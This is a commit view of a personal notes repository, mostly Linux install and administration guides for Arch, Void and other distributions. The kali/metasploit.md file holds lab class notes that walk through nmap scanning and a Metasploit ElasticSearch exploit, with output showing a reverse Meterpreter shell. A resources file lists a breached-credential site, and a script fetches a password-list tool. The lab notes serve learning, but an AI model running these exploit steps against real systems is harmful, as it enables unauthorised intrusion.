disu1950/lk
1
0
Fork 0
forked from andonome/lk
Code Pull Requests Activity

initial commit

Browse Source
This commit is contained in:
Malin Freeborn
2020-01-02 01:04:35 +01:00
commit 6befc5d3c1
162 changed files with 19086 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

59
distros/arch/arch_pi_install.md Normal file
View File

@@ -0,0 +1,59 @@
# Initial Setup
<!-- modified since testing
-->
Some of this needs executed as root, so it's probably easier to do the whole things as root.
> fdisk /dev/sdX
o,n,t,c
> mkfs.vfat /dev/sdX1
> mkdir boot
> mount /dev/sdX1 boot
Create and mount the ext4 filesystem:
> mkfs.ext4 /dev/sdX2
> mkdir root
> mount /dev/sdX2 root
Download and extract the root filesystem (as root, not via sudo):
> wget http://archlinuxarm.org/os/ArchLinuxARM-rpi-3-latest.tar.gz
> tar zxvf ArchLinuxARM-rpi-3-latest.tar.gz -C root
> sync
Move boot files to the first partition:
> mv root/boot/* boot
> Unmount the two partitions:
> umount boot root
echo belgradecats > /etc/hostname
echo "# /etc/hosts: static lookup table for host names
```
<ip-address> <hostname.domain.org> <hostname>
127.0.0.1 belgradecats.localdomain belgradecats
::1 belgradecats.localdomain belgradecats ip6-localhost
```
# End of file" > /etc/hosts
# Get audio on
echo dtparam=audio=on >> /boot/config.txt
pacman-key --init
pacman-key --populate archlinuxarm
pacman -Syyu base-devel git alsa-utils xf86-video-fbdev
timedatectl set-timezone Europe/Belgrade

130
distros/arch/basic-install.md Normal file
View File

@@ -0,0 +1,130 @@
Keyboard layout changed.
> ls /usr/share/kbd/keymaps/**/*.map.gz
> loadkeys uk.map.gz
Check if boot mode is UEFI
> ls /sys/firmware/efi/efivars
Without efivars, the system must boot with BIOS.
# Check network's up
> ping archlinux.org
Set system clock properly
> timedatectl set-ntp true
Check disks
> lsblk
Make partition
> fdisk -l
- Boot: 200M
- Swap: Double Ram's a nice standard.
- \/: 15G
- Home: The rest
- var: probably doesn't need a partition, but can be nice if you're
* Worried about filling up with logs.
* Intending to fill up with torrents, which land in /var/.
parted alternative
mklabel gpt
mkpart ESP fat32 1MiB 200MiB
set 1 boot on
name 1 efi
Use pacstrap to get the base install.
> mount /dev/sda3 /mnt/
> mkdir /mnt/home
> mkdir /mnt/boot
> mount /dev/sda3 /mnt/home
> mount /dev/sda1 /mnt/boot
> pacstrap /mnt base base-devl vim
Make fstab notes for new system.
> genfstab -U /mnt >> /mnt/etc/fstab
> arch-chroot /mnt
> echo 'en_GB.UTF-8' > /etc/default/locale
> pacman -Sy networkmanager grub
> grub-install --target=i386-pc /dev/sda
> grub-mkconfig -o /boot/grub/grub.cfg
set local time
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
Find the desired locale's and uncomment them.
> vi /etc/locale.gen
> locale-gen
Make your keyboard changes permenent with:
> vi /etc/vconsole.conf
then set: `KEYMAP=uk.map.gz`
unsure about this bit - is this name just for the loadkeys function?
make a hostname
echo pc > /etc/hostname
Set hostnames for network, or at least your own.
> vi /etc/hosts
# This should have the following, at least:
127.0.0.1 localhost
::1 localhost
127.0.1.1 [hostname].localdomain [hostname]
If the system has a permanent IP address, it should be used instead of localhost.
Ping some sites to make sure the network's working
> passwd
> exit
> umount -R /mnt
Remove retarded beep sound:
> sudo echo "blacklist pcspkr" >> /etc/modprobe.d/nobeep.conf
> rmmod pcspkr
# Fonts
sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono

121
distros/arch/basic-install.sh Normal file
View File

@@ -0,0 +1,121 @@
Commands not preceded with # or $ are lines in config files.
Keyboard layout changed.
ls /usr/share/kbd/keymaps/**/*.map.gz
loadkeys uk.map.gz
Check if boot mode is UEFI
ls /sys/firmware/efi/efivars
Without efivars, the system must boot with BIOS.
Check network is up
> ping archlinux.org
Set system clock properly
> timedatectl set-ntp true
Check disks
> lsblk
Make partition
> fdisk -l
- Boot: 200M
- Swap: 12G???
- \/: 15G
- Home: The rest
parted alternative:
> mklabel gpt
> mkpart ESP fat32 1MiB 200MiB
> set 1 boot on
> name 1 efi
Use pacstrap to get the base install.
> mount /dev/sda3 /mnt/
> mkdir /mnt/home
> mkdir /mnt/boot
> mount /dev/sda3 /mnt/home
> mount /dev/sda1 /mnt/boot
> pacstrap /mnt base base-devel vim
Make fstab notes for new system.
> genfstab -U /mnt >> /mnt/etc/fstab
> arch-chroot /mnt
echo 'en_GB.UTF-8' > /etc/default/locale
pacman -Sy networkmanager grub
> grub-install --target=i386-pc /dev/sda
> grub-mkconfig -o /boot/grub/grub.cfg
set local time
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
Find the desired locale's and uncomment them.
> vi /etc/locale.gen
> locale-gen
Mkae your keyboard changes permenent with:
> vi /etc/vconsole.conf
then set: `KEYMAP=uk.map.gz`
Make a hostname
> vi /etc/hostname
This should have the following:
```
::1 localhost
127.0.1.1 [hostname].localdomain [hostname]
```
If the system has a permanent IP address, it should be used instead of localhost.
Ping some sites to make sure the network's working
> passwd
> exit
> umount -R /mnt
Remove retarded beep sound
> # echo "blacklist pcspkr" > /etc/modprobe.d/nobeep.conf
> rmmod pcspkr
## Fonts
> sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono

46
distros/arch/blackarch.md Normal file
View File

@@ -0,0 +1,46 @@
## Basics
List Blackarch Packages
> sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u
Install all with
> sudo pacman -S blackarch
List availalble groups with
> sudo pacman -Sg | grep blackarch | cut -d- -f2
Install a group with
> sudo pacman blackarch-$thing
e.g.
> sudo blackarch-cracker
## Install from Source
First install blackman.
> sudo pacman -S blackman
List categories:
> blackman -l
Then install all from a category with:
> sudo blackman -p [ category ]
Or install from source with:
> sudo blackman -g [ group name]
or
> sudo blackman -i [ package ]

26
distros/arch/blackarch.sh Normal file
View File

@@ -0,0 +1,26 @@
#!/bin/bash
# Just tested - working fine so far.
# update
pacman -Syyu
curl -O https://blackarch.org/strap.sh
sh="$(sha1sum strap.sh)"
echo "Does $sh equal 9f770789df3b7803105e5fbc19212889674cd503 ?"
read ent
if [ ! $(echo $ent | grep -c y ) ] ; then
echo bye
exit 1
fi
chmod +x strap.sh
./strap.sh
echo Finished

94
distros/arch/encrypted.md Normal file
View File

@@ -0,0 +1,94 @@
> # taken from https://0x00sec.org/t/arch-linux-with-lvm-on-luks-dm-crypt-disk-encryption-installation-guide-legacy-bios-system/1479
> # if you need wifi
> wifi-menu
> timedatectl set-ntp true
> fdisk -l
> parted /dev/sda
> (parted) mklabel msdos
> (parted) mkpart primary ext2 1MB 512MB
> (parted) mkpart primary ext4 512MB 100%
> (parted) print
> (parted) set 1 boot on
> (parted) quit
> fdisk -l
> cryptsetup luksFormat /dev/sda2
> # make a name. Here I use "crypt".
cryptsetup open /dev/sda2 crypt
> pvcreate /dev/mapper/crypt
> # now a group name - "usb"
> vgcreate usb /dev/mapper/crypt
> lvcreate -L 8GB usb -n swap
> lvcreaate -L 30G usb -n root
> lvcreate -l 100%FREE usb -n home
> mkfs.ext4 /dev/mapper/usb-home
mkfs.ext4 /dev/mapper/usb-root
> mkswap /dev/mapper/usb-swap
> mkfs.ext2 /dev/sda1
> mount /dev/mapper/usb-root /mnt
mkdir /mnt/home
> mount /dev/mapper/usb-home /mnt/home
mkdir /mnt/boot
> mount /dev/sda1 /mnt/boot
swapon /dev/mapper/usb-swap
pacstrap -i /mnt base base-devel efibootmgr grub
genfstab -U /mnt >> /mnt/etc/fstab
arch-chroot /mnt
############ new root #############
ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
# uncomment en_GT.UTF-8
> vi /etc/locale.gen
> locale-gen
> # add `LANG=en_GB.UTF-8` to /etc/locale.conf
> vi /etc/locale.conf
> echo crypt > /etc/hostname
> # make sure keyboard encrypt lvm2 are on the list of HOOKS
> vi /etc/mkinitcpio.conf
> grub-install /dev/sda
> vi /etc/default/grub
edit the GRUB_CMDLINE_LINUX=""
`GRUB_CMDLINE_LINUX="cryptdevice=/dev/sda2:usb root=/dev/mapper/usb-root"`
> grub-mkconfig -o /boot/grub/grub.cfg
> mkinitcpio -p linux
> pacman -S wpa_supplicant dialog

15
distros/arch/fonts.md Normal file
View File

@@ -0,0 +1,15 @@
# Basics
Update font-cache:
> fc-cache
List fonts:
> fc-list
Grab the part of the font name you need for Xresources:
> fc-list | cut -d: -f2
Add field 3 for styles.

94
distros/arch/lxc.md Normal file
View File

@@ -0,0 +1,94 @@
This is an untested mess.
# Required
> sudo pacman -S lxc arch-install-scripts dnsmasq
Place the following in /etc/default/lxc-net to configure the network:
---
# Leave USE_LXC_BRIDGE as "true" if you want to use lx
cbr0 for your
# containers. Set to "false" if you'll use virbr0 or
another existing
# bridge, or mavlan to your host's NIC.
USE_LXC_BRIDGE="true"
# If you change the LXC_BRIDGE to something other than
lxcbr0, then
# you will also need to update your /etc/lxc/default.c
onf as well as the
# configuration (/var/lib/lxc/<container>/config) for
any containers
# already created using the default config to reflect
the new bridge
# name.
# If you have the dnsmasq daemon installed, you'll als
o have to update
# /etc/dnsmasq.d/lxc and restart the system wide dnsma
sq daemon.
LXC_BRIDGE="lxcbr0"
LXC_ADDR="10.0.3.1"
LXC_NETMASK="255.255.255.0"
LXC_NETWORK="10.0.3.0/24"
LXC_DHCP_RANGE="10.0.3.2,10.0.3.254"
LXC_DHCP_MAX="253"
# Uncomment the next line if you'd like to use a conf-
file for the lxcbr0
# dnsmasq. For instance, you can use 'dhcp-host=mail1
,10.0.3.100' to have
# container 'mail1' always get ip address 10.0.3.100.
#LXC_DHCP_CONFILE=/etc/lxc/dnsmasq.conf
# Uncomment the next line if you want lxcbr0's dnsmasq
to resolve the .lxc
# domain. You can then add "server=/lxc/10.0.3.1' (or
your actual $LXC_ADDR)
# to your system dnsmasq configuration file (normally
/etc/dnsmasq.conf,
# or /etc/NetworkManager/dnsmasq.d/lxc.conf on systems
that use NetworkManager).
# Once these changes are made, restart the lxc-net and
network-manager services.
# 'container1.lxc' will then resolve on your host.
#LXC_DOMAIN="lxc"
---
Then start the lxc NAT:
> sudo systemctl start lxc-net
> sudo systemctl restart NetworkManager
... and make sure the bridge's ip-range doesn't intefere withe local network.
> sudo arp-scan -I lxcbr0 -l
The lxc template is in /etc/lxc/default.conf. You need to modify it so that it uses lxcbr0.
---
/etc/lxc/default.conf
lxc.net.0.type = veth
lxc.net.0.link = lxcbr0
lxc.net.0.flags = up
lxc.net.0.hwaddr = 00:16:3e:xx:xx:xx
---
# Making machines
> sudo lxc-create -n roach -t download -- --dist archlinux --release current --arch amd64
Arch linux containers take up about 600 Megs.
To speed up the startup process, one can install haveged and start the haveged.service. Haveged stops the wait-time for system entropy creation.
Machines are stored in /var/lib/lxc.
# Starting
> lxc-attach -n roach

31
distros/arch/pacman.md Normal file
View File

@@ -0,0 +1,31 @@
Packages are kept in /var/cache/pacman/pkg.
Delete unused old packages with:
> sudo pacman -Sc
Signatures are handled by the pacman-key, initially set up with:
> sudo pacman-key --populate archlinux
And refreshed with:
sudo pacman-key --refresh-keys
If you have usigned keys, you can refresh with:
> sudo pacman -Sc
or
> sudo pacman -Scc
Reset all keys with:
> sudo rm -r /etc/pacmand.d/gnupg/ && sudo pacman-key --init
If you're constantly getting 'everything corrupted, nothing upgraded', try running:
> sudo pacman -S archlinux-keyring

BIN
distros/arch/perl.zip Normal file
View File

Binary file not shown.

37
distros/arch/pi-hole-server.md Normal file
View File

@@ -0,0 +1,37 @@
> yay -S pi-hole-server pi-hole-ftl
> sudo systemctl disable systemd-resolved
> sudo systemctl stop systemd-resolved
> sudo systemctl enable pi-hole-server pihole-FTL
> sudo systemctl start pi-hole-server pihole-FTL
Remove that google dns server.
> pihole -a setdns 1.1.1.1 1.0.0.1
Disable pihole password by setting a blank password.
> pihole -a -p
# Configure cloudflare DNS
> yay -S cloudflared-bin
echo "proxy-dns: true
proxy-dns-upstream:
- https://1.0.0.1/dns-query
- https://1.1.1.1/dns-query
- https://2606:4700:4700::1111/dns-query
- https://2606:4700:4700::1001/dns-query
proxy-dns-port: 5053
proxy-dns-address: 0.0.0.0" > /etc/cloudflared/cloudflared.yml
echo "
PRIVACYLEVEL=0
IGNORE_LOCALHOST=no
AAAA_QUERY_ANALYSIS=yes

5
distros/arch/problems.md Normal file
View File

@@ -0,0 +1,5 @@
Broken Xorg
> sudo X -configure

47
distros/arch/scripts/archpi.sh Normal file
View File

@@ -0,0 +1,47 @@
#!/bin/bash
# https://www.unixmen.com/install-arch-linux-raspberry-pi/
pacman-key --init || echo init fail >> log
pacman-key --populate archlinuxarm || echo update fail >> log
pacman -Syyuu || echo update fail >> log
sed -i s/#en_GB.UTF-8 UTF-8/en_GB.UTF-8 UTF-8/ /etc/locale.gen
echo 'LANG=en_GB.UTF-8' >> /etc/locale.conf
locale-gen
pacman -S base-devel htop ranger tmux lolcat fortune-mod texlive-most darkhttpd git figlet rxvt-unicode task timew calcurse fail2ban
if [[ $2 == all || $1 == all ]]; then
pacman -S nnn feh dmenu rofi xf86-video-fbdev xorg xorg-xinit xorg-server xorg-server-utils xterm
fi
# Audio
echo 'dtparam=audio=on' >> /boot/config.txt
if [[ $1 == audio ]]; then
pacman -S alsa-utils alsa-firmware alsa-lib alsa-plugins
fi
echo 'device_tree_param=spi=on' >> /boot/config.txt
# for a vnc viewer
if [[ $1 == vnc ]]; then
tigervnc gcc geany i3 i3status compton feh sxiv rxvt-unicode
fi
# Swap
cd /var/cache/swap
sudo dd if=/dev/zero of=swapfile bs=1K count=2M
sudo chmod 600 swapfile
sudo mkswap swapfile
sudo swapon swapfile
echo "/var/cache/swap/swapfile none swap sw 0 0" | sudo tee -a /etc/fstab

8
distros/arch/scripts/flatpak-steam.sh Normal file
View File

@@ -0,0 +1,8 @@
#!/bin/bash
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam

16
distros/arch/scripts/pihole.sh Normal file
View File

@@ -0,0 +1,16 @@
#!/bin/bash
# This has been changed since testing.
yay -S pi-hole-ftl pi-hole-server
# Configuration in /etc/pihole/pihole-FTL.db
# You can change DBINTERVAL to 60 or more to limit writes to disk
sudo systemctl disable systemd-resolved
sudo systemctl stop systemd-resolved
sudo systemctl start pihole-FTL
pihole -g || echo '' ; echo 'Your pihole is gubbed' ; exit 1
pihole -c

8
distros/arch/scripts/steam.sh Normal file
View File

@@ -0,0 +1,8 @@
#!/bin/bash
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam

10
distros/arch/scripts/yay.sh Normal file
View File

@@ -0,0 +1,10 @@
git clone https://aur.archlinux.org/yay.git
cd yay
makepkg -si
yay -S perl-graph-easy signal-desktop sc-im ncpamixer xdg-utils-mimeo
yay -S ttf-tengwar-annatar

10
distros/arch/steam.sh Normal file
View File

@@ -0,0 +1,10 @@
#!/bin/bash
sudo pacman -S flatpak
flatpak --user remote-add --if-not-exists flathub https://dl.flathub.org/repo/flathub.flatpakrepo
flatpak --user install flathub com.valvesoftware.Steam
flatpak run com.valvesoftware.Steam

22
distros/debian/apt.md Normal file
View File

@@ -0,0 +1,22 @@
# Problems
## apt
### Configurations?
Fucked up a package's configuration files?
> sudo apt-get purge [thing]
> sudo apt autoremove
Check if you still have related things:
> apt search [thing]
> sudo apt-get install [ thing ]
Still have problems?
> sudo dpgk --force-confmiss -i /var/cache/apt/archives/[thing]

5
distros/debian/ubuntu/lubuntu.md Normal file
View File

@@ -0,0 +1,5 @@
# Videos not working
> sudo apt-get install lubuntu-restricted-extras

87
distros/kali/install-kali.sh Normal file
View File

@@ -0,0 +1,87 @@
cd /usr/share/X11/xkb/symbols/
cp pc pc.bak
echo "pc backup copied - this isn't tested" >> ~/install.log
sed s/Caps_Lock/Escape/ pc > pc
cd
echo "deb https://dl.bintray.com/hawkeye116477/waterfox-deb release main" | sudo tee -a /etc/apt/sources.list
curl https://bintray.com/user/downloadSubjectPublicKey?username=hawkeye116477 | sudo apt-key add -
sudo apt-get update && sudo apt-get install waterfox
echo "deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free" >> /etc/apt/sources.list
setxkbmap gb
# gksudo firefox -install-global-extension addon-1865-latest.xpi
#install addon with cli
apt-get -y install openvpn
cd /etc/openvpn
sudo wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip
unzip ovpn.zip
rm ovpn.zip
sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome
wget https://github.com/maestrogerardo/i3-gaps-deb/archive/master.zip
echo "if you don't have openvpn options in your gnome desktop, this just isn't going to work. Get the openvpn manager, called 'openvpn-service-gnome' or some such" >> ~/*log
unzip ma*
rm ma*zip
cd i3-g*
sudo apt -y update;sudo apt -y upgrade
./i3*
cd
mv i3/ .config
sudo apt install feh compton ranger w3m cmus scrot
sudo apt install tor
wget https://github.com/dpayne/cli-visualizer/archive/master.zip
echo "If vis is playing funny-buggers, enter the install files and input the commands manually. May be an architecture problem as I don't have arm cpu" >> *log
unzip master.zip
rm master.zip
cd cli-vis*
apt install libfftw3-dev libncursesw5-dev libpulse-dev
./install.sh
cd
mkdir Images;mkdir Images/Wallpapers;mkdir Images/Screenshots
apt install -y encfs cmatrix cowsay
mkdir Tools
cd Tools
wget https://github.com/Mebus/cupp/archive/master.zip
unzip master.zip;rm master.zip
cd

124
distros/kali/metasploit.md Normal file
View File

@@ -0,0 +1,124 @@
> service postgresql start
> systemctl status postgresql
> msfdb init
start the metasploit
> msfconfole
show exploits
Examples:
> info exploit/something
> search cve:2019
## Basic theory
There are vulnerabilities and payloads.
Payloads would typically give us a shell on the remote system. Android, Linux and Windows require different shells.
You can attach via 'reverse' or 'bind'. A 'bind' is best, as the user opens a port, and you connect. Mostly, you have to use 'reverse', which opens a connection to you.
# Notes for Class
Victim: 172.18.3.26
> nmap -Pn -sV 172.18.3.26 --script=vuln
> nmap -Pn -sV 172.18.3.26
Output:
```
Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)
Nmap scan report for 172.18.3.26
Host is up (0.016s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
4848/tcp open appserv-http?
8022/tcp open oa-system?
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8383/tcp open ssl/m2mservices?
9200/tcp open tcpwrapped
49153/tcp open unknown
49154/tcp open unknown
49159/tcp open unknown
49161/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo
SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\
SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");
MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```
Note this one:
`9200/tcp open tcpwrapped`
Apparently that's 'elasticsearch', so in metasploit we can do:
`search elasticsearch`
```
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/elasticsearch/indices_enum normal Yes ElasticSearch Indices Enumeration Utility
1 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal
2 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution
3 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass
4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
```
If you want to use 2, `use 2` or `use/multi/ela` then tab out.
> show options
> set rhost 172.18.3.26
The remote port's already set at this point.
We've so far done use, rhost, and port.
> exploit
```
[*] Started reverse TCP handler on 172.18.3.112:4444
[*] Trying to execute arbitrary Java...
[*] Discovering remote OS...
[+] Remote OS is 'Windows Server 2008 R2'
[*] Discovering TEMP path
[+] TEMP path identified: 'C:\Windows\TEMP\'
[*] Sending stage (53845 bytes) to 172.18.3.26
[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target
```
> dir
# Next Wordpress
http://172.18.3.26:8585/wordpress/
Back to normal shell.
> search wordpress ninja
> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload

8
distros/kali/webresources Normal file
View File

@@ -0,0 +1,8 @@
https://coldwallet.io/
https://www.it-vn.com/2019/07/configure-ssh-to-avoid-from-shodan-and.html
https://wickr.com
https://weleakinfo.com/

11
distros/redhat/Oracle/basics.md Normal file
View File

@@ -0,0 +1,11 @@
> cd /etc/yum.repos.d/
> vim public.yum*
These are branches of the same Oracle server.
The first - 'latest' - is enabled by default.
You can change 'enabled' from 0 to 1 for various repositories.

11
distros/redhat/npm.md Normal file
View File

@@ -0,0 +1,11 @@
package.json is the basic configuration file.
Everything is per-directory.
> npm install x
This'll install x in the current directory.
> npm init
> npm install express --save

22
distros/redhat/yum.md Normal file
View File

@@ -0,0 +1,22 @@
# Overview
Forks include CentOS, scientific Linux, Oracle, and Fedora.
Major features: reliable, shit package selection.
# Basically yum
> yum search [package]
> yum list openssh
> yum install [package1] [package2]
> yum check-updates
> yum update
yum remove [package1] [package2]

8
distros/suse/http_server.md Normal file
View File

@@ -0,0 +1,8 @@
Nothing interesting.
1. Install
2. Set a dns resolver in /etc/resolv.conf (`nameserver 1.1.1.1` works)
3. Enable NetworkManager
3. zypper install http-something php5 apache2
4. vi /srv/www/htdocs/index.html
5. Enable apache2

43
distros/void/autologin Normal file
View File

@@ -0,0 +1,43 @@
# Automatic Login On TTY1
Create a new autologin service:
> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
Note: The name of the custom service file must end with -tty1 (or another valid port). Otherwise the run-script will not work.
> vim /etc/sv/agetty-autologin-tty1/conf:
```
GETTY_ARGS="--autologin yourusernamehere --noclear"
BAUD_RATE=38400
TERM_NAME=linux
```
If you are logged in on tty1 right now, logout, switch to tty2 (with CTRL+ALT+F2) and re-login there.
Disable the regular tty1 service and enable autologin:
> rm /var/service/agetty-tty1
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
Now switch to tty1 and you should already be logged in there automatically.
Autostart Graphical Environment on Login
Add the following to your shell's profile file to start X and lock the tty session:
# Autologin on tty1
In `bashrc`.
```
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
exec startx
fi
```

21
distros/void/autologin.md Normal file
View File

@@ -0,0 +1,21 @@
Make the autologin service:
> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
> echo "GETTY_ARGS="--autologin yourusernamehere --noclear"
> BAUD_RATE=38400
> TERM_NAME=linux" > /etc/sv/agetty-autologin-tty1/conf
> rm /var/service/agetty-tty1
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
Then stick this at the end of the bashrc:
```
# autologin on tty1
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
exec startx
fi
```

20
distros/void/basics.md Normal file
View File

@@ -0,0 +1,20 @@
# vkpurge
Old Void kernels are left on the boot partition. List them with:
> vkpurge list
Remove one with:
> vkpurge 2.8.2_4
Remove all but the latest with:
> vkpurge rm all
# Brightness
/sys/class/backlight/*/brightness

12
distros/void/extrace.md Normal file
View File

@@ -0,0 +1,12 @@
Monitor all processes:
> extrace
Monitor one process:
> extrace ls
Monitor a script:
> ./script.sh | extrace

20
distros/void/kernels.md Normal file
View File

@@ -0,0 +1,20 @@
# vkpurge
Old Void kernels are left on the boot partition. List them with:
> vkpurge list
Remove one with:
> vkpurge 2.8.2_4
Remove all but the latest with:
> vkpurge rm all
# Troubleshooting
Filled up your /boot? Try reconfiguring and installing the latest:
> xbps-reconfigure -f linux5.2

6
distros/void/keyboard Normal file
View File

@@ -0,0 +1,6 @@
To list keyboard specs:
> locale

64
distros/void/lxc Normal file
View File

@@ -0,0 +1,64 @@
#Intro
Taken from [this](https://r4nd0m6uy.ch/unpriviledged-containers-in-void-linux.html)
Void linux requires additional steps to set up, as Systemd is no present to automatically take care of everything.
> sudo xbps-install cgmanager dbus bridge-utils lxc
Next, startup services:
> sudo ln -s /etc/sv/dbus/ /var/service/
> sudo ln -s /etc/sv/cgmanager/ /var/service/
> sudo sv start dbus
> sudo sv start cgmanager
> sudo sv start dbus
> sudo sv start cgmanager
Maps your user account to the lxc g/u ids:
> sudo usermod --add-subuids 100000-165536 $USER
> sudo usermod --add-subgids 100000-165536 $USER
Then add a bridge interface to connect the container.
> sudo brctl addbr lxbr0
Then add an interface. I have no idea how this is done or what it means, so I tried my wifi 'wlp3s0', and that was refused. I tried the guide's one, which obviously didn't work as I didn't have the same interface as in the guide. Finally, I tried `ip addr show` and noticed other devices 'lo' and 'wwp0s20u4i6'. This gave me:
> sudo brctl addif lxbr0 wwp0s20u4i6
... which worked.
If you don't want to redo this each boot, you can make a runit service for it apparently - more research is required for this. For now, I'm just copy-pasting the guide (almost) and sticking this in ~/.config/lxc/default.conf:
`lxc.network.type = veth`
`lxc.network.link = wwp0s20u4i6`
`lxc.network.flags = up`
`lxc.network.hwaddr = 00:16:3e:BB:CC:DD`
`lxc.id_map = u 0 100000 65536`
`lxc.id_map = g 0 100000 65536`
You can now configure a different bridge each boot to connect with the lxc containers, or ....
Next, do this at *every boot* (or script it):
> sudo cgm create all $USER
> sudo cgm chown all $USER $(id -u) $(id -g)
> cgm movepid all $USER $$

34
distros/void/networking.md Normal file
View File

@@ -0,0 +1,34 @@
# Bridged adapters
Virtual machines can use a bridge to connect to the internet. Access the manual with
> man brctl
You can add a new bridge with:
> brctl addbr <name>
... and delete a bridge by pulling it down, then
> brctl delbr <name>
# wpa_supplicant
> scan
> scan_results
> add_network
> set_network 0 ssid "MYSSID"
> set_network 0 psk "passphrase"
OR > set_network 0 key_mgmt NONE
> enable_network 0
> save_config
might want to 'sudo sv restart dhcpcd'

20
distros/void/rpi-void-install.sh Normal file
View File

@@ -0,0 +1,20 @@
#!/bin/sh
ln -s /etc/sv/ntpd /var/service
sv start ntpd
sleep 3
ntpd -q
echo 'dtparam=audio=on' >> /boot/config.txt
xbps-install -Syuv
xbps-install -Sy xorg-minimal xf86-video-fbturbo
useradd -m -G wheel,audio,video ghost
xbps-install sc-im vim cowsay lolcat-c ranger lf bash

12
distros/void/sv Normal file
View File

@@ -0,0 +1,12 @@
# Basics
Services display in /var/service
sv up ssh
sv down ssh
sv restart ssh
# Making a Service
Look in the `/etc/sv` directory, then in the existing services' run files.
You'll find a simple dash script (therefore Posix compliant).

115
distros/void/xbps.md Normal file
View File

@@ -0,0 +1,115 @@
Install cowsay
> xbps-install cowsay
Look for cowsay
> xbps-query -Rs cowsay
Upgrade current packages. -R looks at repositories, -s makes things sloppy.
> xbps-install -Suv
Remove cowsay
> xbps-remove cowsay
...and all dependencies
> xbps-remove -R cowsay
Reinstall cowsay
> xbps-install -f
Reconfigure all packages. Useful for breakages.
> xbps-pkgdb -a
Remove all dependencies.
> xbps-remove -o
Show information about cowsay
> xbps-query -RS cowsay
Search for cows
> xbps-query -Rs cows
List packages requiring updates.
> xbps-install -Suvn
List what's required for cowsay
> xbps-query -x cowsay
List what's installed.
> xbps-query -l
Clean.
> xbps-remove -O
apt update
> xbps-install -S
Remove package information.
> xbps-query -R
Display all cowsay files
> xbps-query -Rf cowsay
Do I have cowsay installed?
> xbps-query -s cowsay
What packages are pointless?
> xbps-query -O
> xbps-install -Sn cowsay
A dry-run of installing cowsay, without actually intalling.
# Advanced
> xbps-query -x cowsay
Show cowsay's dependencies. The -R flag's required for a remote package.
> xbps-query -X cowsay
Show the reverse dependencies of a package.
> xbps-query -XR cowsay
Show all reverse dependencies of a package, including repository packages.
> xbps-query -m
List all manually installed software.
# Problems
Look for broken packages.
> sudo xbps-pkgdb -a
And if you've found any, you might try:
> sudo xbps-reconfigure -af
This reconfigures all packages forcefully.
If that doesn't help the issue, try to find the broken package and forcefully reinstall:
> xbps-query -s gnutls
> sudo xbps-install -f gnutls